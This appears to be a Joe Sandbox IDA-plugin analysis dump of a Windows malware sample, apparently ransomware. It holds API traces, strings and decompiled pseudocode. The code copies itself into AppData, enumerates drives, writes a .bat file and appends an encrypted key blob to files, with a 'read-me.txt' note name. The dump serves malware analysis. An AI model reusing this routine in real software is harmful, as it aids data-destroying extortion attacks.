                                                                                                                                                        0x00409d85
                                                                                                                                                        0x00409d95
                                                                                                                                                        0x00409da2
                                                                                                                                                        0x00409da8
                                                                                                                                                        0x00409da9
                                                                                                                                                        0x00409dab
                                                                                                                                                        0x00409dc9
                                                                                                                                                        0x00409dc9
                                                                                                                                                        0x00409dce
                                                                                                                                                        0x00409dd3
                                                                                                                                                        0x00409dd9
                                                                                                                                                        0x00409dde
                                                                                                                                                        0x00409de7
                                                                                                                                                        0x00409de9
                                                                                                                                                        0x00409deb
                                                                                                                                                        0x00409e00
                                                                                                                                                        0x00409e18
                                                                                                                                                        0x00409e1d
                                                                                                                                                        0x00409e22
                                                                                                                                                        0x00409e25
                                                                                                                                                        0x00409e2a
                                                                                                                                                        0x00409e46
                                                                                                                                                        0x00409e5d
                                                                                                                                                        0x00409e64
                                                                                                                                                        0x00409e69
                                                                                                                                                        0x00409e6a
                                                                                                                                                        0x00409e6e
                                                                                                                                                        0x00409e71
                                                                                                                                                        0x00409e7a
                                                                                                                                                        0x00409e82
                                                                                                                                                        0x00409e83
                                                                                                                                                        0x00409e89
                                                                                                                                                        0x00409e8b
                                                                                                                                                        0x00409e8d
                                                                                                                                                        0x00409e94
                                                                                                                                                        0x00409e94
                                                                                                                                                        0x00409e95
                                                                                                                                                        0x00409e95
                                                                                                                                                        0x00409e9b
                                                                                                                                                        0x00409e9d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409e9f
                                                                                                                                                        0x00409ea1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409ea1
                                                                                                                                                        0x00409ea3
                                                                                                                                                        0x00409ea6
                                                                                                                                                        0x00409ec6
                                                                                                                                                        0x00409ed2
                                                                                                                                                        0x00409eee
                                                                                                                                                        0x00409efa
                                                                                                                                                        0x00409eff
                                                                                                                                                        0x00409f0d
                                                                                                                                                        0x00409f12
                                                                                                                                                        0x00409f17
                                                                                                                                                        0x00409f18
                                                                                                                                                        0x00409f19
                                                                                                                                                        0x004094f5
                                                                                                                                                        0x004094fd
                                                                                                                                                        0x00409502
                                                                                                                                                        0x00409503
                                                                                                                                                        0x0040950d
                                                                                                                                                        0x0040951c
                                                                                                                                                        0x00409532
                                                                                                                                                        0x0040953a
                                                                                                                                                        0x0040954d
                                                                                                                                                        0x00409555
                                                                                                                                                        0x0040956d
                                                                                                                                                        0x0040957d
                                                                                                                                                        0x0040958b
                                                                                                                                                        0x00409593
                                                                                                                                                        0x0040959a
                                                                                                                                                        0x004095a5
                                                                                                                                                        0x004095ab
                                                                                                                                                        0x004095ad
                                                                                                                                                        0x004095b0
                                                                                                                                                        0x004095b7
                                                                                                                                                        0x004095ba
                                                                                                                                                        0x004095bd
                                                                                                                                                        0x004095c0
                                                                                                                                                        0x004095c8
                                                                                                                                                        0x004095d4
                                                                                                                                                        0x004095d6
                                                                                                                                                        0x004095e3
                                                                                                                                                        0x004095e5
                                                                                                                                                        0x004095ef
                                                                                                                                                        0x00409601
                                                                                                                                                        0x00409609
                                                                                                                                                        0x00409609
                                                                                                                                                        0x004095c8
                                                                                                                                                        0x00409555
                                                                                                                                                        0x0040960f
                                                                                                                                                        0x0040960f
                                                                                                                                                        0x00409ea8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409ea8
                                                                                                                                                        0x00409df4
                                                                                                                                                        0x00409df6
                                                                                                                                                        0x00409df8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409dfa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409dfa
                                                                                                                                                        0x00409dad
                                                                                                                                                        0x00409db2
                                                                                                                                                        0x00409db4
                                                                                                                                                        0x00409dc8
                                                                                                                                                        0x00409dc8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409dc8
                                                                                                                                                        0x00409dbe
                                                                                                                                                        0x00409dc4
                                                                                                                                                        0x00409dc6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409d6a
                                                                                                                                                        0x00409d71
                                                                                                                                                        0x00409d73
                                                                                                                                                        0x00409d75
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409d77
                                                                                                                                                        0x00409d78
                                                                                                                                                        0x00409d78
                                                                                                                                                        0x00409d78

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00402779: GetProcessHeap.KERNEL32(00000000,?,00409C7C,00000020,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000,?,?,?,?,00409F25), ref: 0040277F
                                                                                                                                                          • Part of subcall function 00402779: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 00402786
                                                                                                                                                          • Part of subcall function 0040278D: GetProcessHeap.KERNEL32(00000000,?,?,00409CA0,00001000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000200,00000000,00000000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000), ref: 0040279E
                                                                                                                                                          • Part of subcall function 0040278D: HeapReAlloc.KERNEL32(00000000,?,?,?,?,00409F25), ref: 004027A5
                                                                                                                                                          • Part of subcall function 0040278D: GetProcessHeap.KERNEL32(00000000,?,00409CA0,00001000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000200,00000000,00000000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,00000210,00401124,00000020,00000000), ref: 004027AE
                                                                                                                                                          • Part of subcall function 0040278D: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,00409F25), ref: 004027B5
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000800), ref: 00409CD3
                                                                                                                                                          • Part of subcall function 004093F4: MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,000000FF,00000000,00000000,00000000,.xls,00409D0B,.xls,00000000,read-me.txt,00000030,00000020,00000000,.xls), ref: 00409406
                                                                                                                                                          • Part of subcall function 004093F4: MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,00000000,00000000), ref: 00409428
                                                                                                                                                          • Part of subcall function 00409AAB: lstrlenA.KERNEL32(00000000,00000000,00000290,00000000,00000020,00000000,00000000,.xls,00000800,00001000,00409D2A,Windows,0040CA9C,00000290,.xls,00000000), ref: 00409AC9
                                                                                                                                                          • Part of subcall function 00409AAB: HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00409AE9
                                                                                                                                                          • Part of subcall function 00409AAB: HeapAlloc.KERNEL32(00000000,00000000,00000001), ref: 00409AF7
                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(LOCALAPPDATA,00000000,00000800,.xls,0040C638,00000110,Windows,0040CA9C,00000290,.xls,00000000,read-me.txt,00000030,00000020,00000000,.xls), ref: 00409D64
                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(APPDATA,00000000,00000800), ref: 00409D71
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00409D78
                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000), ref: 00409D85
                                                                                                                                                        • PathFindFileNameW.SHLWAPI ref: 00409D8D
                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00409D95
                                                                                                                                                        • lstrcmpiW.KERNELBASE(00000000), ref: 00409DA2
                                                                                                                                                        • CopyFileW.KERNELBASE(00000000,00000000,00000000), ref: 00409DBE
                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(public,00000000,00000800,00000000), ref: 00409DE7
                                                                                                                                                        • GetEnvironmentVariableW.KERNEL32(ALLUSERSPROFILE,00000000,00000800), ref: 00409DF4
                                                                                                                                                        • lstrcpyW.KERNEL32 ref: 00409E5D
                                                                                                                                                        • lstrcpyW.KERNEL32 ref: 00409E6E
                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000), ref: 00409E71
                                                                                                                                                        • lstrcatW.KERNEL32(00000000), ref: 00409E7A
                                                                                                                                                        • Sleep.KERNEL32(000003E8,00000000), ref: 00409E95
                                                                                                                                                          • Part of subcall function 0040998F: GetProcessHeap.KERNEL32(00000000,00000070,00000000,0000000A,76734AB0,00000000), ref: 004099A3
                                                                                                                                                          • Part of subcall function 0040998F: HeapAlloc.KERNEL32(00000000), ref: 004099A6
                                                                                                                                                          • Part of subcall function 0040998F: GetLogicalDrives.KERNELBASE ref: 004099AE
                                                                                                                                                          • Part of subcall function 0040998F: GetDriveTypeA.KERNELBASE(?,?,?,000007FC), ref: 004099EA
                                                                                                                                                          • Part of subcall function 0040998F: GetProcessHeap.KERNEL32 ref: 00409A0B
                                                                                                                                                          • Part of subcall function 0040998F: HeapAlloc.KERNEL32(00000000), ref: 00409A0E
                                                                                                                                                          • Part of subcall function 0040998F: lstrcpyA.KERNEL32(00000000,?), ref: 00409A21
                                                                                                                                                          • Part of subcall function 0040998F: GetProcessHeap.KERNEL32(00000000,0000000C,?,?,000007FC), ref: 00409A4A
                                                                                                                                                          • Part of subcall function 0040998F: HeapAlloc.KERNEL32(00000000,?,?,000007FC), ref: 00409A51
                                                                                                                                                          • Part of subcall function 0040998F: CreateThread.KERNELBASE(00000000,00000000,004096D7,00000000,00000000,00000000), ref: 00409A7F
                                                                                                                                                          • Part of subcall function 0040998F: WaitForMultipleObjects.KERNEL32(00000000,?,00000001,000000FF,?,?,000007FC), ref: 00409A98
                                                                                                                                                          • Part of subcall function 00409435: GetTempPathW.KERNEL32(00000800,00000000,00000000,0000000A,00000000,00409F17,67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0), ref: 00409455
                                                                                                                                                          • Part of subcall function 00409435: GetTempFileNameW.KERNEL32(00000000,tmp,00000000,00000000), ref: 00409465
                                                                                                                                                          • Part of subcall function 00409435: lstrcatW.KERNEL32(00000000,.bat), ref: 00409471
                                                                                                                                                          • Part of subcall function 00409435: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00409487
                                                                                                                                                        Strings
                                                                                                                                                        • public, xrefs: 00409DE2
                                                                                                                                                        • Windows, xrefs: 00409D20
                                                                                                                                                        • .xls, xrefs: 00409D3F
                                                                                                                                                        • 67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0, xrefs: 00409F02
                                                                                                                                                        • LOCALAPPDATA, xrefs: 00409D5F
                                                                                                                                                        • ALLUSERSPROFILE, xrefs: 00409DEF
                                                                                                                                                        • .xls, xrefs: 00409CE2, 00409CE9, 00409D05
                                                                                                                                                        • read-me.txt, xrefs: 00409CFA, 00409E41
                                                                                                                                                        • CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22, xrefs: 00409C5D, 00409C6F, 00409C84
                                                                                                                                                        • APPDATA, xrefs: 00409D6C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$Process$AllocFile$EnvironmentPathVariable$CreateNamelstrcatlstrcpy$AllocateBackslashByteCharMultiTempWide$CopyDriveDrivesExitFindLogicalModuleMultipleObjectsSleepThreadTypeWaitlstrcmpilstrlen
                                                                                                                                                        • String ID: .xls$.xls$67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0$ALLUSERSPROFILE$APPDATA$CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22$LOCALAPPDATA$Windows$public$read-me.txt
                                                                                                                                                        • API String ID: 923490256-1114673202
                                                                                                                                                        • Opcode ID: 8fefa23ebf5bb1208adb1b258b966cf7b992a3fdc29568f655d9a9d6c4a3e8e3
                                                                                                                                                        • Instruction ID: 8afda6228436f321db794eaa275c7f0030248e8528c9ee36fb091b07c2fa02fe
                                                                                                                                                        • Opcode Fuzzy Hash: 8fefa23ebf5bb1208adb1b258b966cf7b992a3fdc29568f655d9a9d6c4a3e8e3
                                                                                                                                                        • Instruction Fuzzy Hash: 4351A271641205FBD721AB72AE8AF5B3A68EB49758F00013BF904765F2DBBD4C409E6C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 133 409b37-409b5b CreateFileW 134 409b68-409b76 GetLastError 133->134 135 409b5d-409b63 GetLastError 133->135 137 409be0-409be6 134->137 138 409b78-409bde call 402779 call 40a102 call 4027bc call 402765 SetFilePointer WriteFile 134->138 136 409c50-409c54 135->136 139 409c45-409c4f CloseHandle 137->139 140 409be8-409c04 ReadFile 137->140 138->139 139->136 142 409c41-409c43 GetLastError 140->142 143 409c06-409c0e 140->143 142->139 143->142 145 409c10-409c31 SetFilePointer ReadFile 143->145 145->142 147 409c33-409c3b 145->147 147->142 149 409c3d-409c3f 147->149 149->139
                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                        			E00409B37(void* __edx, WCHAR* _a4) {
                                                                                                                                                        				long _v8;
                                                                                                                                                        				long _v44;
                                                                                                                                                        				void* __ecx;
                                                                                                                                                        				void* _t8;
                                                                                                                                                        				int _t13;
                                                                                                                                                        				int _t17;
                                                                                                                                                        				void* _t18;
                                                                                                                                                        				void* _t26;
                                                                                                                                                        				void* _t27;
                                                                                                                                                        				void* _t29;
                                                                                                                                                        				int _t31;
                                                                                                                                                        				void* _t40;
                                                                                                                                                        
                                                                                                                                                        				_t29 = __edx;
                                                                                                                                                        				_t8 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                                                                                                                                        				_t26 = _t8;
                                                                                                                                                        				if(_t26 != 0xffffffff) {
                                                                                                                                                        					_t31 = GetLastError();
                                                                                                                                                        					__eflags = _t31;
                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                        						__eflags = _t31 - 0xb7;
                                                                                                                                                        						if(_t31 != 0xb7) {
                                                                                                                                                        							L11:
                                                                                                                                                        							CloseHandle(_t26);
                                                                                                                                                        							return _t31;
                                                                                                                                                        						}
                                                                                                                                                        						_t13 = ReadFile(_t26,  *0x40caa4, 0x100,  &_v8, 0);
                                                                                                                                                        						__eflags = _t13;
                                                                                                                                                        						if(_t13 == 0) {
                                                                                                                                                        							L10:
                                                                                                                                                        							_t31 = GetLastError();
                                                                                                                                                        							goto L11;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _v8 - 0x100;
                                                                                                                                                        						if(_v8 != 0x100) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						SetFilePointer(_t26, 2, 0, 1);
                                                                                                                                                        						_t17 = ReadFile(_t26, "67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A\nA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB\nA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40\nE7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66\nC0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82\n5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C\n92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D\n12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0\n72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D\n30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0\nE2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2\nAC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C\n5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10\n6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32\nE4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5\n79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74\n", 0x300,  &_v8, 0);
                                                                                                                                                        						__eflags = _t17;
                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _v8 - 0x300;
                                                                                                                                                        						if(_v8 != 0x300) {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						_t31 = 0;
                                                                                                                                                        						goto L11;
                                                                                                                                                        					}
                                                                                                                                                        					_t18 = E00402779(0x400);
                                                                                                                                                        					_pop(_t27);
                                                                                                                                                        					_push(_t26);
                                                                                                                                                        					_push("read-me.txt");
                                                                                                                                                        					_push(".xls");
                                                                                                                                                        					_t37 = _t18;
                                                                                                                                                        					E0040A102(_t27, _t29, __eflags, _t18, "CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A220170BE4EFE2ABD73679449A9F6D76945658163AC438EA18DA29B256F6314054ED3CFBFA076B26E03E7E0AA7ED248094F4FD6DB36CC1927B4F0A8BB905407C22D92A6B0C6E91FE9C9FB7BE8DA319331650D42BA7552C96459064ABED01516477AE1FA5334241988FFA0E504710A8290CFAC1263F11C7AC0F6FC5692CC77F9",  *0x401120, _a4,  *0x40caa4);
                                                                                                                                                        					_t40 = "67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A\nA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB\nA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40\nE7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66\nC0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82\n5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C\n92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D\n12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0\n72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D\n30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0\nE2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2\nAC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C\n5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10\n6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32\nE4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5\n79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74\n";
                                                                                                                                                        					E004027BC(_t27, __eflags, _t37, _t40);
                                                                                                                                                        					E00402765(_t37);
                                                                                                                                                        					SetFilePointer(_t26, 0, 0, 2); // executed
                                                                                                                                                        					WriteFile(_t26, _t40, 0x300,  &_v44, 0); // executed
                                                                                                                                                        					goto L11;
                                                                                                                                                        				}
                                                                                                                                                        				return GetLastError();
                                                                                                                                                        			}















                                                                                                                                                        0x00409b37
                                                                                                                                                        0x00409b50
                                                                                                                                                        0x00409b56
                                                                                                                                                        0x00409b5b
                                                                                                                                                        0x00409b72
                                                                                                                                                        0x00409b74
                                                                                                                                                        0x00409b76
                                                                                                                                                        0x00409be0
                                                                                                                                                        0x00409be6
                                                                                                                                                        0x00409c45
                                                                                                                                                        0x00409c46
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409c4f
                                                                                                                                                        0x00409c00
                                                                                                                                                        0x00409c02
                                                                                                                                                        0x00409c04
                                                                                                                                                        0x00409c41
                                                                                                                                                        0x00409c43
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409c43
                                                                                                                                                        0x00409c06
                                                                                                                                                        0x00409c0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409c16
                                                                                                                                                        0x00409c2d
                                                                                                                                                        0x00409c2f
                                                                                                                                                        0x00409c31
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409c33
                                                                                                                                                        0x00409c3b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409c3d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409c3d
                                                                                                                                                        0x00409b7d
                                                                                                                                                        0x00409b82
                                                                                                                                                        0x00409b83
                                                                                                                                                        0x00409b84
                                                                                                                                                        0x00409b89
                                                                                                                                                        0x00409b94
                                                                                                                                                        0x00409ba6
                                                                                                                                                        0x00409bab
                                                                                                                                                        0x00409bb2
                                                                                                                                                        0x00409bb8
                                                                                                                                                        0x00409bc5
                                                                                                                                                        0x00409bd8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409bd8
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,76734AB0,00000000,?,?,00409E89,00000000), ref: 00409B50
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00409E89,00000000), ref: 00409B5D
                                                                                                                                                        • GetLastError.KERNEL32(00000000,0000000A,?,?,00409E89,00000000), ref: 00409B70
                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0,00000000,CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22,?,.xls,read-me.txt,00000000,?,?,00409E89,00000000), ref: 00409BC5
                                                                                                                                                        • WriteFile.KERNELBASE(00000000,67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0,00000300,?,00000000,?,?,00409E89,00000000), ref: 00409BD8
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00409E89,00000000), ref: 00409C46
                                                                                                                                                        Strings
                                                                                                                                                        • 67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0, xrefs: 00409BAB, 00409BB0, 00409BD6, 00409C27
                                                                                                                                                        • .xls, xrefs: 00409B89
                                                                                                                                                        • read-me.txt, xrefs: 00409B84
                                                                                                                                                        • CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22, xrefs: 00409BA0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$ErrorLast$CloseCreateHandlePointerWrite
                                                                                                                                                        • String ID: .xls$67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0AA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FBA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 825C C4 72 95 44 72 E0$CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A22$read-me.txt
                                                                                                                                                        • API String ID: 2469612962-14443284
                                                                                                                                                        • Opcode ID: f92e4c453808e2c5001e99fa471a1152e244961b376c8cbd299145611037734e
                                                                                                                                                        • Instruction ID: cd77de083fa2d5c7519c011a947374dbebe4b4fdc479250b43a579004a6e36cc
                                                                                                                                                        • Opcode Fuzzy Hash: f92e4c453808e2c5001e99fa471a1152e244961b376c8cbd299145611037734e
                                                                                                                                                        • Instruction Fuzzy Hash: CF212B72608304BFE31067619D89F673A9CDB48364F110537F741B21E1CBB9AC40863D
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
